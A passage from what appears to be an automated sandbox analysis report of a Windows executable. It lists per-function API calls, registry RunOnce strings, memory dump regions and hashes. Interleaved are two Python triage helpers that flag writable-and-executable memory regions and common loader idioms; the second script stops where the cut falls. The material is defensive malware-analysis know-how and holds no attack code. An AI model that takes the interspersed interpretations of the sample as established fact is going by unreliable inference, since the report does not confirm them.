• API String ID: 2608676048-1826575653
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0043DBA9
• CreateFileW.KERNEL32(0000000D,40000000,00000000,00000000,00000002,00000080,00000000,00000058,0043DE15), ref: 0043DC09
• GetLastError.KERNEL32 ref: 0043DC16
• WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0043DC94
• ReadFile.KERNEL32(?,00000000,00000400,?,00000000), ref: 0043DCDB
• FlushFileBuffers.KERNEL32(00000000), ref: 0043DCED
• CloseHandle.KERNEL32(00000000), ref: 0043DCF4
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$BuffersCloseCreateErrorFlushH_prolog3_HandleLastReadWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 616238222-0
                                                                                                                                                                          • Opcode ID: 356d8cc5cb1c6b5bbb6911515d0b82ad4221770631e4fd99e0e6ace0fcd0c9d8
                                                                                                                                                                          • Instruction ID: 585ed323ddebd3186147cacc8200258d99ae34fe2ae40330d5e2382ea7eabb15
                                                                                                                                                                          • Opcode Fuzzy Hash: 356d8cc5cb1c6b5bbb6911515d0b82ad4221770631e4fd99e0e6ace0fcd0c9d8
                                                                                                                                                                          • Instruction Fuzzy Hash: 95418E70E10248AFEB14DFA4DC48B9EBBB5FF48304F14512AF905AB2D1DB799846CB18
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00437295
• _memset.LIBCMT ref: 004372B4
  • Part of subcall function 0040D2E5: __EH_prolog3_GS.LIBCMT ref: 0040D2EC
• ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0043742C
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog3_$ExecuteShell_memset
• String ID: ClickOncePackage$Startup$open
• API String ID: 447700153-1966403724
• Opcode ID: 166a867035b2f0d98fb31b563a3d6b85ab3fc5a696903fde6426d034676c793e
• Instruction ID: 00bad6d7401b0886463fa289844bf76d771b88c6f561a79deecea4fe01b8a211
• Opcode Fuzzy Hash: 166a867035b2f0d98fb31b563a3d6b85ab3fc5a696903fde6426d034676c793e
• Instruction Fuzzy Hash: 4341A071900168AACB20E660CC45BDE77B8BF51304F1081EEE58AB70C1DE749B88CFD9
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00421656
  • Part of subcall function 00401410: GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 00401434
  • Part of subcall function 00401410: RegCloseKey.ADVAPI32(00000000), ref: 00401497
• _memset.LIBCMT ref: 004216AC
• RegEnumValueW.ADVAPI32(?,00000000), ref: 0042178E
  • Part of subcall function 004013E0: RegCloseKey.ADVAPI32(00000000,00000000,0043F3BA,000001F0,?,00000000,0000000A,?,?,00000001,ServicePack,?,00000001,?,000001F0,00000000), ref: 004013EA
Strings
• Software\Microsoft\Windows\CurrentVersion\RunOnceEx, xrefs: 0042172F
• Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 004216F8
• SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\RunOnceEntries, xrefs: 00421679
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: Close$EnumH_prolog3_HandleModuleValue_memset
• String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\RunOnceEntries$Software\Microsoft\Windows\CurrentVersion\RunOnce$Software\Microsoft\Windows\CurrentVersion\RunOnceEx
• API String ID: 2943836032-2087105512
• Opcode ID: 5c9e872f7fbef1b7a44bb7fdc4a11a250758c8b47fc4cc289af89f7e00326637
• Instruction ID: 7af0678b6373b23addbd9c9fea746be422660ee720224ba66001048b6291ef41
• Opcode Fuzzy Hash: 5c9e872f7fbef1b7a44bb7fdc4a11a250758c8b47fc4cc289af89f7e00326637
• Instruction Fuzzy Hash: 7E3123F1A002289ADB20DA559DC1BEEB6BCAB58348F9040EEB709B2151E6745F48CF1D
Uniqueness
Uniqueness Score: -1.00%

APIs
• _memmove.LIBCMT ref: 0045FD78
• _memmove.LIBCMT ref: 0045FD98
• lstrcmpA.KERNEL32(0000000B,NETSCAPE2.0,?,?,?,?,00000000,?,?,0046006A,0046006B), ref: 0045FDAD
• _memmove.LIBCMT ref: 0045FDC5
• _memmove.LIBCMT ref: 0045FDEB
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: _memmove$lstrcmp
• String ID: NETSCAPE2.0
• API String ID: 1993653321-1278374441
• Opcode ID: 71f3c7f5955ebbbe6865800370e219d421245660fb8700587bc6d7fd965eb667
• Instruction ID: 32c8fe1df6bd92f4ae7f53de35fb128e30bd5f96bb62c24c7875583381a47579
• Opcode Fuzzy Hash: 71f3c7f5955ebbbe6865800370e219d421245660fb8700587bc6d7fd965eb667
• Instruction Fuzzy Hash: 36319071D00219EFDF21CFA5D841AAEB7F9FF59315F10086EE941A6102D3749648CB96
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 004172F8
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
  • Part of subcall function 00416CC5: __EH_prolog3_GS.LIBCMT ref: 00416CCC
  • Part of subcall function 0041751D: __EH_prolog3.LIBCMT ref: 00417524
  • Part of subcall function 0040F686: __EH_prolog3_GS.LIBCMT ref: 0040F690
  • Part of subcall function 004100B6: __EH_prolog3_GS.LIBCMT ref: 004100BD
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
  • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
  • Part of subcall function 00433A33: __EH_prolog3.LIBCMT ref: 00433A3A
  • Part of subcall function 00457737: __EH_prolog3_GS.LIBCMT ref: 00457741
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog3_$ErrorLast$H_prolog3$FreeString
• String ID: .ini$0x%04x$FontSize$HsG$Properties
• API String ID: 827811706-668208750
• Opcode ID: 8a14e5430e4646c9b7a14fcd2a64fb09da9a8b3b9f9d66380dd93b15fd6e8317
• Instruction ID: 01fc65d52f24158b68c173272ef29a0ae57f5ce3c2ab66c70089087955249d7b
• Opcode Fuzzy Hash: 8a14e5430e4646c9b7a14fcd2a64fb09da9a8b3b9f9d66380dd93b15fd6e8317
• Instruction Fuzzy Hash: A731D131904248EADB10E7A4CC06BEDBB74AB14304F54419EF545B71C2EBB80B88CBA6
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 004589EF
  • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
  • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
  • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
  • Part of subcall function 00459249: __EH_prolog3.LIBCMT ref: 00459250
  • Part of subcall function 0040F99A: __EH_prolog3_GS.LIBCMT ref: 0040F9A4
  • Part of subcall function 00458C92: __EH_prolog3_GS.LIBCMT ref: 00458C99
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog3_$ErrorH_prolog3Last
• String ID: .DLL$.EXE$.OCX$.TLB$HsG
• API String ID: 1247511005-2009803391
• Opcode ID: a1cbdd08920035b137a9b162ff234bafb4b194f72ee74464b6f1c18764d76c6c
• Instruction ID: 1e6655abbd4ccfe61a04ff375f6c5a7ef4005c331331184d2614f1a6e8a8bf97
• Opcode Fuzzy Hash: a1cbdd08920035b137a9b162ff234bafb4b194f72ee74464b6f1c18764d76c6c
• Instruction Fuzzy Hash: CC3174B0900209BEDB04FF65C8925AE7B68AF14349F50402FFC1566263EF79894ACB9D
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrcpyW.KERNEL32 ref: 00440D1D
• lstrcpyW.KERNEL32 ref: 00440D27
  • Part of subcall function 0043FBBE: lstrlenW.KERNEL32(?,74B48250,?,00440D35,?), ref: 0043FBCA
• _swscanf.LIBCMT ref: 00440D9C
  • Part of subcall function 0044502E: _vscan_fn.LIBCMT ref: 00445042
• _swscanf.LIBCMT ref: 00440DC5
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: _swscanflstrcpy$_vscan_fnlstrlen
• String ID: %u.%u.%u.%u$CJ
• API String ID: 1604777239-2639954372
• Opcode ID: 41d9aed87dab70958e70d4741761836200fe8b0acb79f0c2f1a9a6320159d62c
• Instruction ID: 6704d938412cdd5bb68d5123881e454f0f69d75877d20ede4da5c58791a323cb
• Opcode Fuzzy Hash: 41d9aed87dab70958e70d4741761836200fe8b0acb79f0c2f1a9a6320159d62c
• Instruction Fuzzy Hash: FD31CFF2D1112CAADB20DF95DD44ACEB7BCAB48714F4041EBB609E3101D674AB89CF99
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00418334
• CreateCompatibleDC.GDI32(?), ref: 00418349
• SelectObject.GDI32(00000000,?), ref: 00418366
• SetStretchBltMode.GDI32(?,00000004), ref: 0041839D
• StretchBlt.GDI32(?,?,?,?,?,00000000,?,?,?,?,00CC0020), ref: 004183C5
• SetStretchBltMode.GDI32(?,00000000), ref: 004183CF
• BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 004183E8
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: Stretch$Mode$CompatibleCreateH_prolog3ObjectSelect
• String ID:
• API String ID: 3333437850-0
• Opcode ID: ac47494f2d0392b9f7ed79f09c5ae834809778a50cdd03702fdbe21bdfa736ab
• Instruction ID: 0a90db99123f0c350c4330a97819a75f34c7ffeb20e4cb14a68f5d94413c97e2
• Opcode Fuzzy Hash: ac47494f2d0392b9f7ed79f09c5ae834809778a50cdd03702fdbe21bdfa736ab
• Instruction Fuzzy Hash: 25211931500209AFCF11DF90CC85EEE7F72FF04760F158119FA289A2A1CB7299A1DB94
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00436E1D
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
  • Part of subcall function 004035C0: SysStringLen.OLEAUT32(?), ref: 004035CE
  • Part of subcall function 004035C0: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 004035E8
  • Part of subcall function 0043EB86: __EH_prolog3_GS.LIBCMT ref: 0043EB90
  • Part of subcall function 0043EB86: _memset.LIBCMT ref: 0043EBC3
  • Part of subcall function 0043EB86: GetModuleFileNameW.KERNEL32(?,00000104), ref: 0043EBDD
  • Part of subcall function 0043EB86: _memset.LIBCMT ref: 0043EC0A
  • Part of subcall function 0043EB86: _memset.LIBCMT ref: 0043EC55
  • Part of subcall function 0043EB86: GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,?), ref: 0043EC69
  • Part of subcall function 0043EB86: GetTempFileNameW.KERNEL32(?,0047D474,00000000,?,?,?,?,?,?,?,?,?), ref: 0043EC83
  • Part of subcall function 00403460: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30), ref: 0040349F
  • Part of subcall function 00403460: GetLastError.KERNEL32(?,00000000,000000FF), ref: 00403539
  • Part of subcall function 00403460: SysFreeString.OLEAUT32(?), ref: 00403553
  • Part of subcall function 00403460: SysFreeString.OLEAUT32(?), ref: 00403560
  • Part of subcall function 00403460: SetLastError.KERNEL32(?), ref: 00403584
  • Part of subcall function 00403460: SetLastError.KERNEL32(?,?,00000000,74B04C30), ref: 0040358A
  • Part of subcall function 00444D99: __wtof_l.LIBCMT ref: 00444DA1
• GetLocalTime.KERNEL32(?), ref: 00436EB1
• SystemTimeToVariantTime.OLEAUT32(?,?), ref: 00436EC7
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$String$Time_memset$FileFreeH_prolog3_NameTemp$AllocLocalModulePathSystemVariant__wtof_l
• String ID: ExpireDate$HsG$Startup
• API String ID: 2576575598-4025281889
• Opcode ID: d1ac7a3dd998a3fed13e8993fb3abad4c9f7527ab2fc52fa3d58a9a321862882
• Instruction ID: 1cc14bca14ab8cdbea8164c3b06a1067a6e85e7ae6b1b4347218a8399ac6f31e
• Opcode Fuzzy Hash: d1ac7a3dd998a3fed13e8993fb3abad4c9f7527ab2fc52fa3d58a9a321862882
• Instruction Fuzzy Hash: D52181B1D00218EFCB01EFE0CD45ADDBBB8EF08304F60805AE505BB195E7789649CB99
Uniqueness

Uniqueness Score: -1.00%

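The Memory Dump Source lists above name each dumped region by its base address and its page protection. The Python below is an added illustration, not code from Joe Sandbox, from this report, or from the analysed sample: it parses those dump names, decodes the protection field with the winnt.h PAGE_* constants, and flags regions that were both writable and executable at dump time. The assumed field layout (process, stage, dump id, base address, protection, type) is an assumption about the dump naming scheme; only the base address and protection fields are relied on. Run on the ten dumps listed for this process it flags 0x401000 and 0x448000 (PAGE_EXECUTE_WRITECOPY, which on an image mapping means the section header carries IMAGE_SCN_MEM_WRITE) and 0x445000 (PAGE_EXECUTE_READWRITE, a private RWX range of the kind unpacking or self-patching code produces).

```python
import re

# Assumed field layout of a dump name (an assumption about the naming scheme,
# not documented on the page); only base address and protection are used:
#   <process>.<stage>.<dump id>.<base address>.<protection>.<type>.sdmp
DUMP_NAME = re.compile(
    r"^(?P<process>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protection>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.sdmp$"
)

# Windows memory-protection constants (winnt.h). Exactly one bit of the low
# byte is set; the bits above it are modifiers.
PAGE_BASE = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
EXECUTABLE = 0x10 | 0x20 | 0x40 | 0x80
WRITABLE = 0x04 | 0x08 | 0x40 | 0x80  # copy-on-write pages are writable too


def parse_dump_name(name):
    """Split a dump file name into its fields; numeric fields become ints."""
    m = DUMP_NAME.match(name.strip())
    if not m:
        raise ValueError("not a recognised dump name: %r" % name)
    f = m.groupdict()
    return {
        "name": name.strip(),
        "process": int(f["process"], 16),
        "stage": int(f["stage"], 16),
        "dump_id": int(f["dump_id"]),
        "base": int(f["base"], 16),
        "protection": int(f["protection"], 16),
        "type": int(f["type"], 16),
    }


def describe_protection(prot):
    """Render a PAGE_* value as winnt.h names, e.g. 0x104 -> PAGE_READWRITE|PAGE_GUARD."""
    parts = [PAGE_BASE[bit] for bit in PAGE_BASE if prot & bit]
    parts += [PAGE_MODIFIERS[bit] for bit in PAGE_MODIFIERS if prot & bit]
    return "|".join(parts) if parts else "0x%x" % prot


def is_wx(prot):
    """True when pages are both executable and writable (including copy-on-write)."""
    return bool(prot & EXECUTABLE) and bool(prot & WRITABLE)


def find_wx_regions(names):
    """Parsed dumps whose pages were writable and executable, sorted by base.

    On an image mapping, PAGE_EXECUTE_WRITECOPY on code pages means the section
    header has IMAGE_SCN_MEM_WRITE set; a PAGE_EXECUTE_READWRITE range usually
    means the protection was changed after mapping (unpacked or patched code).
    """
    regions = [parse_dump_name(n) for n in names]
    return sorted((r for r in regions if is_wx(r["protection"])), key=lambda r: r["base"])


# The dump names listed for this process in the report above.
DUMPS = [
    "00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp",
    "00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp",
    "00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp",
    "00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp",
    "00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp",
    "00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp",
    "00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp",
    "00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp",
    "00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp",
    "00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp",
]

if __name__ == "__main__":
    for r in (parse_dump_name(n) for n in DUMPS):
        flag = "  <-- W+X" if is_wx(r["protection"]) else ""
        print("0x%08X  %-26s%s" % (r["base"], describe_protection(r["protection"]), flag))
```

The W+X test deliberately treats PAGE_EXECUTE_WRITECOPY as writable: a copy-on-write code page can be modified in place by the process that owns it, which is what matters when triaging a sample that rewrites its own code.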
APIs
• GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 00401434
• GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 0040144B
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,00000000), ref: 00401484
• RegCloseKey.ADVAPI32(00000000), ref: 00401497
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: AddressCloseHandleModuleOpenProc
• String ID: Advapi32.dll$RegOpenKeyTransactedW
• API String ID: 823179699-3913318428
• Opcode ID: 9c5d06a007987859836c688bc3a724d62c85b94a5b43c17d2ab1ced68ff20ed6
• Instruction ID: 28ff499bec34f0898057e999838990759897ec0990054c38c35c0d945c7637a1
• Opcode Fuzzy Hash: 9c5d06a007987859836c688bc3a724d62c85b94a5b43c17d2ab1ced68ff20ed6
• Instruction Fuzzy Hash: 3C119071600205FFEB208F55CC48F6BB7A9EB44711F20803AF949AB2B0D7B9D940DB69
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindResourceW.KERNEL32(?,?,00000001,?,?,00000001,?,0041786D,?,?,00000005,00000080,00416E27,00000402,?,00416E3A), ref: 004150F7
• LoadResource.KERNEL32(?,00000000,?,?,00000001,?,0041786D,?,?,00000005,00000080,00416E27,00000402,?,00416E3A,?), ref: 00415107
• SizeofResource.KERNEL32(?,00000000,?,?,00000001,?,0041786D,?,?,00000005,00000080,00416E27,00000402,?,00416E3A,?), ref: 0041511D
• _memset.LIBCMT ref: 0041513E
• LockResource.KERNEL32(00000000,?,utils.cpp,?,00000001,000008A4,0043FC6E,?,00000000), ref: 0041514A
• _memmove.LIBCMT ref: 00415153
• __CxxThrowException@8.LIBCMT ref: 00415166
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: Resource$Exception@8FindLoadLockSizeofThrow_memmove_memset
• String ID:
• API String ID: 3510561357-0
• Opcode ID: 3b86da8d9d14287b4bc96f88f38cdf07f7f0b9052eee2f0d039c92b8b384c454
• Instruction ID: 4d2d8dc3edbe497332fbfdf9013b980bc7efc4292ec0e8cdae9a8fa0d8438462
• Opcode Fuzzy Hash: 3b86da8d9d14287b4bc96f88f38cdf07f7f0b9052eee2f0d039c92b8b384c454
• Instruction Fuzzy Hash: 2D010471500B05BBEB222F21EC45F977F6EEB84794F00443EFA0895222DB75C8808668
Uniqueness

Uniqueness Score: -1.00%
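The two listings above show two idioms that recur in installer and loader stubs: the Advapi32.dll/RegOpenKeyTransactedW block resolves an export at run time (GetModuleHandleW followed by GetProcAddress, with RegOpenKeyExW also called from the same function, consistent with a fallback for systems where the transacted export does not exist), and the FindResourceW/LoadResource/SizeofResource/LockResource/_memmove block copies an embedded resource into a freshly zeroed buffer. When a report contains hundreds of such blocks it pays to parse the "APIs" bullets mechanically rather than eyeball them. The Python below is an added example written for this page; it is not Joe Sandbox code and not code from the analysed sample. It parses the bullet format used here (Name.MODULE(args), ref: address, plus the nested "Part of subcall function" form) and the "String ID" field of the Similarity section, then flags the two patterns. The sample input is the API lines copied from the blocks above; the heuristics (pair each GetProcAddress with the most recent module lookup, require the three resource calls in address order, split String ID on "$") are the example's own assumptions about the report format, not documented Joe Sandbox semantics.

```python
"""Triage helper for Joe Sandbox-style function listings (added example, not report code).

Parses the 'APIs' bullets of one function block and flags two idioms:
  * dynamic API resolution  (GetModuleHandle*/LoadLibrary* followed by GetProcAddress)
  * embedded-resource copy  (FindResource -> LoadResource -> LockResource in address order)
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Bullet lines as printed in the report, e.g.
#   • GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 00401434
#   • _memset.LIBCMT ref: 0041513E
#     • Part of subcall function 0043F50C: __EH_prolog3_GS.LIBCMT ref: 0043F516
_API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<name>[\w@]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$"
)
_HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")
_MODULE_LOOKUPS = {"GetModuleHandleA", "GetModuleHandleW", "LoadLibraryA",
                   "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}
_RESOURCE_CHAIN = ("FindResource", "LoadResource", "LockResource")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str                   # call-site address as printed (8 hex digits)
    subcall_of: Optional[str]  # callee address for nested 'Part of subcall' lines


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every bullet that matches the API-call format; headings and other lines are skipped."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        m = _API_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
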